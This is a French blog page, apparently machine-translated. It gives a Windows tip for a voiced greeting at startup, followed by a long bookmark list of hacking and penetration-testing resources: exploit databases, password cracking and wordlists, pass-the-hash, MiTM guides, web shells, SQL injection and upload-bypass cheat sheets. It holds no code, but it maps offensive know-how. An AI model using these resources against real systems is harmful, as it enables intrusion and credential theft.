© ৳💨g ⋮ LiNKS 👀 https://sites.google.com/view/my-link-s/ . . . . . . . . . . ⭐➕⭐ . . . 🔊 https://sampling-unit.com . . . . . . . . . . ¯\(°_o)/¯

HK 💥 Tool's & Ressources

HK 💥 Tool's  &  Ressources

  • LES CATÉGORIES
  • MESSAGES RÉCENTS


Windows vous salue avec un message vocal personnalisé au démarrage

Résultat de l'image pour savoir comment faire en sorte que votre ordinateur vous accueille

Pour utiliser cette astuce, suivez les instructions ci-dessous: -

  1. Cliquez sur  Démarrer . Accédez à tous les programmes, accessoires et bloc - notes .
  2. Copiez et collez le code exact donné ci-dessous.

Comment faire en sorte que votre ordinateur vous accueille

3. Remplacez  Nom  d' utilisateur par votre propre  nom .

4. Cliquez sur le menu Fichier, Enregistrer sous, sélectionnez Tous les types dans l'option Enregistrer comme type et enregistrez le fichier sous Welcome.vbs ou «* .vbs».

5. Copiez le fichier enregistré.

6. Accédez à  C: \ Documents and Settings \ All Users \ Start Menu \ Programs \ Startup  (dans Windows XP) et à  C: \ Users \ {User-Name} \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Démarrage  (sous Windows 10, Windows 8, Windows 7 et Windows Vista) si C: est votre lecteur système. AppData est un dossier caché. Ainsi, vous devrez sélectionner l'affichage des dossiers cachés dans les options des dossiers pour le localiser. Si vous ne parvenez pas à localiser le dossier de démarrage, appuyez sur la touche Windows + R et tapez  shell: démarrage  dans la boîte de dialogue Exécuter et appuyez sur Entrée. Le dossier de démarrage s'ouvre.

7. Collez le fichier.

 Faites en sorte que votre ordinateur vous accueille au démarrage

Désormais, la prochaine fois que vous démarrerez votre ordinateur, Windows vous accueillera dans sa propre voix informatisée.

Remarque : Pour de meilleurs résultats, il est recommandé de modifier le modèle de son sur Aucun son.

Vous pouvez changer le modèle de son en aucun son en suivant les étapes ci-dessous: -

  1. Accédez au Panneau de configuration.
  2. Cliquez ensuite sur Passer à l'affichage classique.
  3. Cliquez ensuite sur Sons et périphériques audio.
  4. Cliquez ensuite sur l'onglet Sons.
  5. Sélectionnez  Aucun son  dans l'option Schéma sonore.
  6. Si vous souhaitez enregistrer votre schéma sonore précédent, vous pouvez le sauvegarder en cliquant sur Oui dans le menu contextuel.
  7. Cliquez sur OK.

Changer le modèle de son en aucun son

Essayez-le vous-même pour voir comment cela fonctionne. À mon avis, c'est une excellente astuce. Chaque fois que je démarre mon PC devant quelqu'un et que le PC m'accueille, le boursier se demande à quel point mon ordinateur est brillant.


  1. résumé liste des signets

Table des matières

Hacker Media

 == Blogs en vaut la peine: ==

  Ce que dit le titre. Il y a BEAUCOUP de blogs passionnants, ce sont ceux que je surveille constamment et que j'apprécie dans le travail de test quotidien.

   * http://carnal0wnage.blogspot.com/

    * http://www.mcgrewsecurity.com/

    * http://www.gnucitizen.org/blog/

    * http://www.darknet.org.uk/

    * http://spylogic.net/

    * http://taosecurity.blogspot.com/

    * http://www.room362.com/

    * http://blog.sipvicious.org/

    * http://blog.portswigger.net/

    * http://pentestmonkey.net/blog/

    * http://jeremiahgrossman.blogspot.com/

    * http://i8jesus.com/

    * http://blog.c22.cc/

    * http://www.skullsecurity.org/blog/

    * http://blog.metasploit.com/

    * http://www.darkoperator.com/

    * http://blog.skeptikal.org/

    * http://preachsecurity.blogspot.com/

    * http://www.tssci-security.com/

    * http://www.gdssecurity.com/l/b/

    * http://websec.wordpress.com/

    * http://bernardodamele.blogspot.com/

    * http://laramies.blogspot.com/

    * http://www.spylogic.net/

    * http://blog.andlabs.org/

    * http://xs-sniper.com/blog/

    * http://www.commonexploits.com/

    * http://www.sensepost.com/blog/

    * http://wepma.blogspot.com/

    * http://exploit.co.il/

    * http://securityreliks.wordpress.com/

    * http://www.madirish.net/index.html

    * http://sirdarckcat.blogspot.com/

    * http://reusablesec.blogspot.com/

    * http://myne-us.blogspot.com/

    * http://www.notsosecure.com/

    * http://blog.spiderlabs.com/

    * http://www.corelan.be/

    * http://www.digininja.org/

    * http://www.pauldotcom.com/

    * http://www.attackvector.org/

    * http://deviator.net/

    * http://www.alphaonelabs.com/

    * http://www.smashingpasswords.com/

    * http://wirewatcher.wordpress.com/

    * http://gynvael.coldwind.pl/

    * http://www.nullthreat.net/

    * http://www.question-defense.com/

    * http://archangelamael.blogspot.com/

    * http://memset.wordpress.com/

    * http://sickness.tor.hu/

    * http://punter-infosec.com/

    * http://www.securityninja.co.uk/

    * http://securityandrisk.blogspot.com/

    * http://esploit.blogspot.com/

    * http://www.pentestit.com/

 == Forums: ==

 Created for forums that will help in both tool usage, syntax, attack techniques, and collection of scripts and tools. Needs some help. I don't really frequent too many underground forums but i actually find nice one-off scripts and info i can roll into my own code in these places. Would like to add more.

   * http://sla.ckers.org/forum/index.php

    * http://www.ethicalhacker.net/

    * http://www.backtrack-linux.org/forums/

    * http://www.elitehackers.info/forums/

    * http://www.hackthissite.org/forums/index.php

    * http://securityoverride.com/forum/index.php

    * http://www.iexploit.org/

    * http://bright-shadows.net/

    * http://www.governmentsecurity.org/forum/

    * http://forum.intern0t.net/

 == Magazines: ==

   * http://www.net-security.org/insecuremag.php

    * http://hakin9.org/

 == Video: ==

   * http://www.hackernews.com/

    * http://www.securitytube.net/

    * http://www.irongeek.com/i.php?page=videos/aide-winter-2011

    * http://avondale.good.net/dl/bd/

    * http://achtbaan.nikhef.nl/27c3-stream/releases/mkv/

    * http://www.youtube.com/user/ChRiStIaAn008

    * http://www.youtube.com/user/HackingCons


Méthodologies:

 * http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html

  * http://www.pentest-standard.org/index.php/Main_Page

  * http://projects.webappsec.org/w/page/13246978/Threat-Classification

  * http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

  * http://www.social-engineer.org/


OSINT

 == Présentations: ==

   * http://www.spylogic.net/2009/10/enterprise-open-source-intelligence-gathering-part-1-social-networks/

    * http://www.spylogic.net/2009/10/enterprise-open-source-intelligence-gathering-%E2%80%93-part-2-blogs-message-boards-and-metadata/

    * http://www.spylogic.net/2009/10/enterprise-open-source-intelligence-gathering-part-3-monitoring/

    * http://www.slideshare.net/Laramies/tactical-information-gathering

    * http://www.sans.org/reading_room/whitepapers/privacy/document_metadata_the_silent_killer__32974

    * http://infond.blogspot.com/2010/05/toturial-footprinting.html

 == Personnes et organisation: ==

   * http://www.spokeo.com/

    * http://www.123people.com/

    * http://www.xing.com/

    * http://www.zoominfo.com/search

    * http://pipl.com/

    * http://www.zabasearch.com/

    * http://www.searchbug.com/default.aspx

    * http://theultimates.com/

    * http://skipease.com/

    * http://addictomatic.com/

    * http://socialmention.com/

    * http://entitycube.research.microsoft.com/

    * http://www.yasni.com/

    * http://tweepz.com/

    * http://tweepsearch.com/

    * http://www.glassdoor.com/index.htm

    * http://www.jigsaw.com/

    * http://searchwww.sec.gov/EDGARFSClient/jsp/EDGAR_MainAccess.jsp

    * http://www.tineye.com/

    * http://www.peekyou.com/

    * http://picfog.com/

    * http://twapperkeeper.com/index.php

 == Infrastructure: ==

   * http://uptime.netcraft.com/

    * http://www.serversniff.net/

    * http://www.domaintools.com/

    * http://centralops.net/co/

    * http://hackerfantastic.com/

    * http://whois.webhosting.info/

    * https://www.ssllabs.com/ssldb/analyze.html

    * http://www.clez.net/

    * http://www.my-ip-neighbors.com/

    * http://www.shodanhq.com/

    * http://www.exploit-db.com/google-dorks/

    * http://www.hackersforcharity.org/ghdb/


Exploits et avis:

 * http://www.exploit-db.com/

  * http://www.cvedetails.com/

  * http://www.milw0rm.com/ (Down définitivement)

  * http://www.packetstormsecurity.org/

  * http://www.securityforest.com/wiki/index.php/Main_Page

  * http://www.securityfocus.com/bid

  * http://nvd.nist.gov/

  * http://osvdb.org/

  * http://www.nullbyte.org.il/Index.html

  * http://secdocs.lonerunners.net/

  * http://www.phenoelit-us.org/whatSAP/index.html

  * http://secunia.com/

  * http://cve.mitre.org/


Cheatsheets and Syntax:

 * http://cirt.net/ports_dl.php?export=services

  * http://www.cheat-sheets.org/

  * http://blog.securitymonks.com/2009/08/15/whats-in-your-folder-security-cheat-sheets/

 == Piratage agile: ==

   * http://www.gnucitizen.org/blog/agile-hacking-a-homegrown-telnet-based-portscanner/

    * http://blog.commandlinekungfu.com/

    * http://www.securityaegis.com/simple-yet-effective-directory-bruteforcing/

    * http://isc.sans.edu/diary.html?storyid=2376

    * http://isc.sans.edu/diary.html?storyid=1229

    * http://ss64.com/nt/

    * http://pauldotcom.com/2010/02/running-a-command-on-every-mac.html

    * http://synjunkie.blogspot.com/2008/03/command-line-ninjitsu.html

    * http://www.zonbi.org/2010/06/09/wmic-the-other-other-white-meat/

    * http://rstcenter.com/forum/22324-hacking-without-tools-windows.rst

    * http://www.coresecurity.com/files/attachments/Core_Define_and_Win_Cmd_Line.pdf

    * http://www.scribd.com/Penetration-Testing-Ninjitsu2-Infrastructure-and-Netcat-without-Netcat/d/3064507

    * http://www.pentesterscripting.com/

    * http://www.sans.org/reading_room/whitepapers/hackers/windows-script-host-hack-windows_33583

    * http://www.blackhat.com/presentations/bh-dc-10/Bannedit/BlackHat-DC-2010-Bannedit-Advanced-Command-Injection-Exploitation-1-wp.pdf

 == OS and Scripts: ==

   * http://en.wikipedia.org/wiki/IPv4_subnetting_reference

    * http://www.nixtutor.com/linux/all-the-best-linux-cheat-sheets/

    * http://shelldorado.com/shelltips/beginner.html

    * http://www.linuxsurvival.com/

    * http://mywiki.wooledge.org/BashPitfalls

    * http://rubular.com/

    * http://www.iana.org/assignments/port-numbers

    * http://www.robvanderwoude.com/ntadmincommands.php

    * http://www.nixtutor.com/linux/all-the-best-linux-cheat-sheets/

 == Tools: ==

   * http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf

    * http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf

    * http://sbdtools.googlecode.com/files/hping3_cheatsheet_v1.0-ENG.pdf

    * http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf

    * http://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf

    * http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html

    * http://h.ackack.net/cheat-sheets/netcat


Distros:

 * http://www.backtrack-linux.org/

  * http://www.matriux.com/

  * http://samurai.inguardians.com/

  * http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project

  * https://pentoo.ch/

  * http://www.hackfromacave.com/articles_and_adventures/katana_v2_release.html

  * http://www.piotrbania.com/all/kon-boot/

  * http://www.linuxfromscratch.org/

  * http://sumolinux.suntzudata.com/

  * http://blog.0x0e.org/2009/11/20/pentesting-with-an-ubuntu-box/#comments

  * http://www.backbox.org/


Labs:

   * http://sourceforge.net/projects/websecuritydojo/

    * http://code.google.com/p/owaspbwa/wiki/ProjectSummary

    * http://heorot.net/livecds/

    * http://informatica.uv.es/~carlos/docencia/netinvm/

    * http://www.bonsai-sec.com/en/research/moth.php

    * http://blog.metasploit.com/2010/05/introducing-metasploitable.html

    * http://pynstrom.net/holynix.php

    * http://gnacktrack.co.uk/download.php

    * http://sourceforge.net/projects/lampsecurity/files/

    * https://www.hacking-lab.com/news/newspage/livecd-v4.3-available.html

    * http://sourceforge.net/projects/virtualhacking/files/

    * http://www.badstore.net/

    * http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10

    * http://www.dvwa.co.uk/

    * http://sourceforge.net/projects/thebutterflytmp/

   * http://www.oldapps.com/

    * http://www.oldversion.com/

    * http://www.exploit-db.com/webapps/

    * http://code.google.com/p/wavsep/downloads/list

    * http://www.owasp.org/index.php/Owasp_SiteGenerator

    * http://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx

    * http://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx

    * http://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx

    * http://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx

   * http://www.webscantest.com/

    * http://crackme.cenzic.com/Kelev/view/home.php

    * http://zero.webappsecurity.com/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com

    * http://testaspnet.vulnweb.com/

    * http://testasp.vulnweb.com/

    * http://testphp.vulnweb.com/

    * http://demo.testfire.net/

    * http://hackme.ntobjectives.com/


Introduction à l'exploitation:

Si vous souhaitez vous lancer dans le développement d'exploit, ce sont vraiment les guides et les documents qui vous aideront à démarrer dans la bonne direction. Étant donné qu'Exploit dev n'est pas mon activité principale, cette section peut toujours utiliser l'aide.

 * http://myne-us.blogspot.com/2010/08/from-0x90-to-0x4c454554-journey-into.html

  * http://www.mgraziano.info/docs/stsi2010.pdf

  * http://www.abysssec.com/blog/2010/05/past-present-future-of-windows-exploitation/

  * http://www.ethicalhacker.net/content/view/122/2/

  * http://code.google.com/p/it-sec-catalog/wiki/Exploitation

  * http://x9090.blogspot.com/2010/03/tutorial-exploit-writting-tutorial-from.html

  * http://ref.x86asm.net/index.html


Ingénierie inverse et logiciels malveillants:

 * http://www.woodmann.com/TiGa/idaseries.html

  * http://www.binary-auditing.com/

  * http://visi.kenshoto.com/

  * http://www.radare.org/y/

  * http://www.offensivecomputing.net/


Mots de passe et hachages:

 * http://www.irongeek.com/i.php?page=videos/password-exploitation-class

  * http://cirt.net/passwords

  * http://sinbadsecurity.blogspot.com/2008/10/ms-sql-server-password-recovery.html

  * http://www.foofus.net/~jmk/medusa/medusa-smbnt.html

  * http://www.foofus.net/?page_id=63

  * http://hashcrack.blogspot.com/

  * http://www.nirsoft.net/articles/saved_password_location.html

  * http://www.onlinehashcrack.com/

  * http://www.md5this.com/list.php?

  * http://www.virus.org/default-password

  * http://www.phenoelit-us.org/dpl/dpl.html

  * http://news.electricalchemy.net/2009/10/cracking-passwords-in-cloud.html

 == Listes de mots: ==

    * http://contest.korelogic.com/wordlists.html

    * http://packetstormsecurity.org/Crackers/wordlists/

    * http://www.skullsecurity.org/wiki/index.php/Passwords

    * http://www.ericheitzman.com/passwd/passwords/

 == Passez le hachage: ==

    * http://www.sans.org/reading_room/whitepapers/testing/pass-the-hash-attacks-tools-mitigation_33283

    * http://www.sans.org/reading_room/whitepapers/testing/crack-pass-hash_33219

    * http://carnal0wnage.blogspot.com/2008/03/using-pash-hash-toolkit.html


MiTM:

 * http://www.giac.org/certified_professionals/practicals/gsec/0810.php

  * http://www.linuxsecurity.com/docs/PDF/dsniff-n-mirror.pdf

  * http://www.cs.uiuc.edu/class/sp08/cs498sh/slides/dsniff.pdf

  * http://www.techvibes.com/blog/a-hackers-story-let-me-tell-you-just-how-easily-i-can-steal-your-personal-data

  * http://www.mindcenter.net/uploads/ECCE101.pdf

  * http://toorcon.org/pres12/3.pdf

  * http://media.techtarget.com/searchUnifiedCommunications/downloads/Seven_Deadliest_UC_Attacks_Ch3.pdf

  * http://packetstormsecurity.org/papers/wireless/cracking-air.pdf

  * http://www.blackhat.com/presentations/bh-europe-03/bh-europe-03-valleri.pdf

  * http://www.oact.inaf.it/ws-ssri/Costa.pdf

  * http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-sam_bowne-hijacking_web_2.0.pdf

  * http://mcafeeseminar.com/focus/downloads/Live_Hacking.pdf

  * http://www.seanobriain.com/docs/PasstheParcel-MITMGuide.pdf

  * http://www.more.net/sites/default/files/2010JohnStrandKeynote.pdf

  * http://www.leetupload.com/database/Misc/Papers/Asta%20la%20Vista/18.Ettercap_Spoof.pdf

  * http://bandwidthco.com/whitepapers/netforensics/arp/EtterCap%20ARP%20Spoofing%20&%20Beyond.pdf

  * http://bandwidthco.com/whitepapers/netforensics/arp/Fun%20With%20EtterCap%20Filters.pdf

  * http://www.iac.iastate.edu/iasg/libarchive/0910/The_Magic_of_Ettercap/The_Magic_of_Ettercap.pdf

  * http://articles.manugarg.com/arp_spoofing.pdf

  * http://academy.delmar.edu/Courses/ITSY2430/eBooks/Ettercap(ManInTheMiddleAttack-tool).pdf

  * http://www.ucci.it/docs/ICTSecurity-2004-26.pdf

  * http://web.mac.com/opticrealm/iWeb/asurobot/My%20Cyber%20Attack%20Papers/My%20Cyber%20Attack%20Papers_files/ettercap_Nov_6_2005-1.pdf

  * http://blog.spiderlabs.com/2010/12/thicknet.html

  * http://www.hackyeah.com/2010/10/ettercap-filters-with-metasploit-browser_autopwn/

  * http://www.go4expert.com/forums/showthread.php?t=11842

  * http://www.irongeek.com/i.php?page=security/ettercapfilter

  * http://openmaniak.com/ettercap_filter.php

  * http://www.irongeek.com/i.php?page=videos/dns-spoofing-with-ettercap-pharming

  * http://www.irongeek.com/i.php?page=videos/ettercap-plugins-find-ip-gw-discover-isolate

  * http://www.irongeek.com/i.php?page=videos/ettercapfiltervid1

  * http://spareclockcycles.org/2010/06/10/sergio-proxy-released/


Outils:

 == OSINT: ==

    * http://www.edge-security.com/theHarvester.php

    * http://www.mavetju.org/unix/dnstracer-man.php

    * http://www.paterva.com/web5/

    === Métadonnées: ===

      * http://www.sans.org/reading_room/whitepapers/privacy/document-metadata-silent-killer_32974

      * http://lcamtuf.coredump.cx/strikeout/

      * http://www.sno.phy.queensu.ca/~phil/exiftool/

      * http://www.edge-security.com/metagoofil.php

      * http://www.darkoperator.com/blog/2009/4/24/metadata-enumeration-with-foca.html

 == Piratage de Google: ==

    * http://www.stachliu.com/index.php/resources/tools/google-hacking-diggity-project/

    * http://midnightresearch.com/projects/search-engine-assessment-tool/#downloads

    * http://sqid.rubyforge.org/#next

    * http://voidnetwork.org/5ynL0rd/darkc0de/python_script/dorkScan.html

 == Web: ==

    * http://www.bindshell.net/tools/beef

    * http://blindelephant.sourceforge.net/

    * http://xsser.sourceforge.net/

    * http://sourceforge.net/projects/rips-scanner/

    * http://www.divineinvasion.net/authforce/

    * http://andlabs.org/tools.html#sotf

    * http://www.taddong.com/docs/Browser_Exploitation_for_Fun&Profit_Taddong-RaulSiles_Nov2010_v1.1.pdf

    * http://carnal0wnage.blogspot.com/2007/07/using-sqid-sql-injection-digger-to-look.html

    * http://code.google.com/p/pinata-csrf-tool/

    * http://xsser.sourceforge.net/#intro

    * http://www.contextis.co.uk/resources/tools/clickjacking-tool/

    * http://packetstormsecurity.org/files/view/69896/unicode-fun.txt

    * http://sourceforge.net/projects/ws-attacker/files/

    * https://github.com/koto/squid-imposter

    == Chaînes d'attaque: ==

      * http://code.google.com/p/fuzzdb/

      * http://www.owasp.org/index.php/Category:OWASP_Fuzzing_Code_Database#tab=Statements

    == Coquilles: ==

      * http://sourceforge.net/projects/yokoso/

      * http://sourceforge.net/projects/ajaxshell/

    == Scanners: ==

      * http://w3af.sourceforge.net/

      * http://code.google.com/p/skipfish/

      * http://sqlmap.sourceforge.net/

      * http://sqid.rubyforge.org/#next

      * http://packetstormsecurity.org/UNIX/scanners/XSSscan.py.txt

      * http://code.google.com/p/fimap/wiki/WindowsAttack

      * http://code.google.com/p/fm-fsf/

    == Proxys: ==

      === Burp: ===

        * http://www.sans.org/reading_room/whitepapers/testing/fuzzing-approach-credentials-discovery-burp-intruder_33214

        * http://www.gdssecurity.com/l/b/2010/08/10/constricting-the-web-the-gds-burp-api/

        * http://sourceforge.net/projects/belch/files/

        * http://www.securityninja.co.uk/application-security/burp-suite-tutorial-repeater-and-comparer-tools

        * http://blog.ombrepixel.com/

        * http://andlabs.org/tools.html#dser

        * http://feoh.tistory.com/22

      * http://www.sensepost.com/labs/tools/pentest/reduh

      * http://www.owasp.org/index.php/OWASP_WebScarab_NG_Project

      * http://intrepidusgroup.com/insight/mallory/

      * http://www.fiddler2.com/fiddler2/

      * http://websecuritytool.codeplex.com/documentation?referringTitle=Home

      * http://translate.google.com/translate?hl=en&sl=es&u=http://xss.codeplex.com/releases/view/43170&prev=/search%3Fq%3Dhttp://www.hackingeek.com/ 2010/08 / x5s-encuentra-fallos-xss-lfi-rfi-en-tus.html% 26hl% 3Den & rurl = translate.google.com & twu = 1

 == Ingénierie sociale: ==

    * http://www.secmaniac.com/

 == Mot de passe: ==

    * http://nmap.org/ncrack/

    * http://www.foofus.net/~jmk/medusa/medusa.html

    * http://www.openwall.com/john/

    * http://ophcrack.sourceforge.net/

    * http://blog.0x3f.net/tool/keimpx-in-action/

    * http://code.google.com/p/keimpx/

    * http://sourceforge.net/projects/hashkill/

 == Metasploit: ==

   * http://www.indepthdefense.com/2009/02/reverse-pivots-with-metasploit-how-not.html

    * http://code.google.com/p/msf-hack/wiki/WmapNikto

    * http://www.indepthdefense.com/2009/01/metasploit-visual-basic-payloads-in.html

    * http://seclists.org/metasploit/

    * http://pauldotcom.com/2010/03/nessus-scanning-through-a-meta.html

    * http://meterpreter.illegalguy.hostzi.com/

    * http://blog.metasploit.com/2010/03/automating-metasploit-console.html

    * http://www.workrobot.com/sansfire2009/561.html

    * http://www.securitytube.net/video/711

    * http://en.wikibooks.org/wiki/Metasploit/MeterpreterClient#download

    * http://vimeo.com/16852783

    * http://milo2012.wordpress.com/2009/09/27/xlsinjector/

    * http://www.fastandeasyhacking.com/

    * http://trac.happypacket.net/

    * http://www.blackhat.com/presentations/bh-dc-10/Ames_Colin/BlackHat-DC-2010-colin-david-neurosurgery-with-meterpreter-wp.pdf

    * http://www.blackhat.com/presentations/bh-dc-10/Egypt/BlackHat-DC-2010-Egypt-UAV-slides.pdf

   === MSF Exploits or Easy: ===

     * http://www.nessus.org/plugins/index.php?view=single&id=12204

      * http://www.nessus.org/plugins/index.php?view=single&id=11413

      * http://www.nessus.org/plugins/index.php?view=single&id=18021

      * http://www.nessus.org/plugins/index.php?view=single&id=26918

      * http://www.nessus.org/plugins/index.php?view=single&id=34821

      * http://www.nessus.org/plugins/index.php?view=single&id=22194

      * http://www.nessus.org/plugins/index.php?view=single&id=34476

      * http://www.nessus.org/plugins/index.php?view=single&id=25168

      * http://www.nessus.org/plugins/index.php?view=single&id=19408

      * http://www.nessus.org/plugins/index.php?view=single&id=21564

      * http://www.nessus.org/plugins/index.php?view=single&id=10862

      * http://www.nessus.org/plugins/index.php?view=single&id=26925

      * http://www.nessus.org/plugins/index.php?view=single&id=29314

      * http://www.nessus.org/plugins/index.php?view=single&id=23643

      * http://www.nessus.org/plugins/index.php?view=single&id=12052

      * http://www.nessus.org/plugins/index.php?view=single&id=12052

      * http://www.nessus.org/plugins/index.php?view=single&id=34477

      * http://www.nessus.org/plugins/index.php?view=single&id=15962

      * http://www.nessus.org/plugins/index.php?view=single&id=42106

      * http://www.nessus.org/plugins/index.php?view=single&id=15456

      * http://www.nessus.org/plugins/index.php?view=single&id=21689

      * http://www.nessus.org/plugins/index.php?view=single&id=12205

      * http://www.nessus.org/plugins/index.php?view=single&id=22182

      * http://www.nessus.org/plugins/index.php?view=single&id=26919

      * http://www.nessus.org/plugins/index.php?view=single&id=26921

      * http://www.nessus.org/plugins/index.php?view=single&id=21696

      * http://www.nessus.org/plugins/index.php?view=single&id=40887

      * http://www.nessus.org/plugins/index.php?view=single&id=10404

      * http://www.nessus.org/plugins/index.php?view=single&id=18027

      * http://www.nessus.org/plugins/index.php?view=single&id=19402

      * http://www.nessus.org/plugins/index.php?view=single&id=11790

      * http://www.nessus.org/plugins/index.php?view=single&id=12209

      * http://www.nessus.org/plugins/index.php?view=single&id=10673

   == NSE: ==

   * http://www.securitytube.net/video/931

    * http://nmap.org/nsedoc/

   == Scanners et scripts Net: ==

   * http://nmap.org/

    * http://asturio.gmxhome.de/software/sambascan2/i.html

    * http://www.softperfect.com/products/networkscanner/

    * http://www.openvas.org/

    * http://tenable.com/products/nessus

    * http://www.rapid7.com/vulnerability-scanner.jsp

    * http://www.eeye.com/products/retina/community

   == Post-exploitation: ==

   * http://www.awarenetwork.org/home/rattle/source/python/exe2bat.py

    * http://www.phx2600.org/archive/2008/08/29/metacab/

    * http://www.room362.com/blog/2011/9/6/post-exploitation-command-lists.html

   == Netcat: ==

   * http://readlist.com/lists/insecure.org/nmap-dev/1/7779.html

    * http://www.radarhack.com/tutorial/ads.pdf

    * http://www.infosecwriters.com/text_resources/pdf/Netcat_for_the_Masses_DDebeer.pdf

    * http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf

    * http://www.dest-unreach.org/socat/

    * http://www.antionline.com/archive/index.php/t-230603.html

    * http://technotales.wordpress.com/2009/06/14/netcat-tricks/

    * http://seclists.org/nmap-dev/2009/q1/581

    * http://www.terminally-incoherent.com/blog/2007/08/07/few-useful-netcat-tricks/

    * http://www.inguardians.com/research/docs/Skoudis_pentestsecrets.pdf

    * http://gse-compliance.blogspot.com/2008/07/netcat.html

   == Inspection de la source: ==

   * http://www.justanotherhacker.com/projects/graudit.html

    * http://code.google.com/p/javasnoop/

   == Extensions Firefox: ==

   * https://addons.mozilla.org/id/firefox/collections/byrned/pentesting/?page=8

    * https://addons.mozilla.org/en-US/firefox/addon/osvdb/

    * https://addons.mozilla.org/en-US/firefox/addon/packet-storm-search-plugin/

    * https://addons.mozilla.org/en-US/firefox/addon/default-passwords-cirtne-58786/

    * https://addons.mozilla.org/en-US/firefox/addon/offsec-exploit-db-search/

    * https://addons.mozilla.org/en-US/firefox/addon/oval-repository-search-plugin/

    * https://addons.mozilla.org/en-US/firefox/addon/cve-dictionary-search-plugin/

    * https://addons.mozilla.org/en-US/firefox/addon/hackbar/

   == Listes d'outils: ==

   * http://packetstormsecurity.org/files/tags/tool

    * http://tools.securitytube.net/index.php?title=Main_Page


Formation / Classes:

 == Sec / Piratage: ==

 * http://pentest.cryptocity.net/

  * http://www.irongeek.com/i.php?page=videos/network-sniffers-class

  * http://samsclass.info/124/124_Sum09.shtml

  * http://www.cs.ucsb.edu/~vigna/courses/cs279/

  * http://crypto.stanford.edu/cs142/

  * http://crypto.stanford.edu/cs155/

  * http://cseweb.ucsd.edu/classes/wi09/cse227/

  * http://www-inst.eecs.berkeley.edu/~cs161/sp11/

  * http://security.ucla.edu/pages/Security_Talks

  * http://www.cs.rpi.edu/academics/courses/spring10/csci4971/

  * http://cr.yp.to/2004-494.html

  * http://www.ece.cmu.edu/~dbrumley/courses/18732-f09/

  * https://noppa.tkk.fi/noppa/kurssi/t-110.6220/luennot

  * http://stuff.mit.edu/iap/2009/#websecurity

 == Metasploit: ==

 * http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training

  * http://www.irongeek.com/i.php?page=videos/metasploit-class

  * http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,6158.0/

  * http://vimeo.com/16925188

  * http://www.ustream.tv/recorded/13396511

  * http://www.ustream.tv/recorded/13397426

  * http://www.ustream.tv/recorded/13398740

 == Programmation: ==

    === Python: ===

   * http://code.google.com/edu/languages/google-python-class/index.html

    * http://www.swaroopch.com/notes/Python_en:Table_of_Contents

    * http://www.thenewboston.com/?cat=40&pOpen=tutorial

    * http://showmedo.com/videotutorials/python

    * http://www.catonmat.net/blog/learning-python-programming-language-through-video-lectures/

   === Ruby: ===

   * http://www.tekniqal.com/

  == Autres divers: ==

 * http://www.cs.sjtu.edu.cn/~kzhu/cs490/

  * https://noppa.tkk.fi/noppa/kurssi/t-110.6220/luennot/

  * http://i-web.iu-tokyo.ac.jp/edu/training/ss/lecture/new-documents/Lectures/

  * http://resources.infosecinstitute.com/

  * http://vimeo.com/user2720399


Vecteurs Web

 == SQLi: ==

 * http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/

  * http://isc.sans.edu/diary.html?storyid=9397

  * http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

  * http://www.evilsql.com/main/index.php

  * http://xd-blog.com.ar/descargas/manuales/bugs/full-mssql-injection-pwnage.html

  * http://securityoverride.com/articles.php?article_id=1&article=The_Complete_Guide_to_SQL_Injections

  * http://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/

  * http://sqlzoo.net/hack/

  * http://www.sqlteam.com/article/sql-server-versions

  * http://www.krazl.com/blog/?p=3

  * http://www.owasp.org/index.php/Testing_for_MS_Access

  * http://web.archive.org/web/20101112061524/http://seclists.org/pen-test/2003/May/0074.html

  * http://web.archive.org/web/20080822123152/http://www.webapptest.org/ms-access-sql-injection-cheat-sheet-EN.html

  * http://www.youtube.com/watch?v=WkHkryIoLD0

  * http://layerone.info/archives/2009/Joe%20McCray%20-%20Advanced%20SQL%20Injection%20-%20L1%202009.pdf

  * http://vimeo.com/3418947

  * http://sla.ckers.org/forum/read.php?24,33903

  * http://websec.files.wordpress.com/2010/11/sqli2.pdf

  * http://old.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

  * http://ha.ckers.org/sqlinjection/

  * http://lab.mediaservice.net/notes_more.php?id=MSSQL

 == Upload Tricks: ==

 * http://www.google.com/#hl=en&q=bypassing+upload+file+type&start=40&sa=N&fp=a2bb30ecf4f91972

  * http://blog.skeptikal.org/2009/11/adobe-responds-sort-of.html

  * http://blog.insicdesigns.com/2009/01/secure-file-upload-in-php-web-applications/

  * http://perishablepress.com/press/2006/01/10/stupid-htaccess-tricks/

  * http://ex.ploit.net/f20/tricks-tips-bypassing-image-uploaders-t3hmadhatt3r-38/

  * http://www.ravenphpscripts.com/article2974.html

  * http://www.acunetix.com/cross-site-scripting/scanner.htm

  * http://www.vupen.com/english/advisories/2009/3634

  * http://msdn.microsoft.com/en-us/library/aa478971.aspx

  * http://dev.tangocms.org/issues/237

  * http://seclists.org/fulldisclosure/2006/Jun/508

  * http://www.gnucitizen.org/blog/cross-site-file-upload-attacks/

  * http://www.ipolicynetworks.com/technology/files/TikiWiki_jhot.php_Script_File_Upload_Security_Bypass_Vulnerability.html

  * http://shsc.info/FileUploadSecurity

 == LFI/RFI: ==

 * http://pastie.org/840199

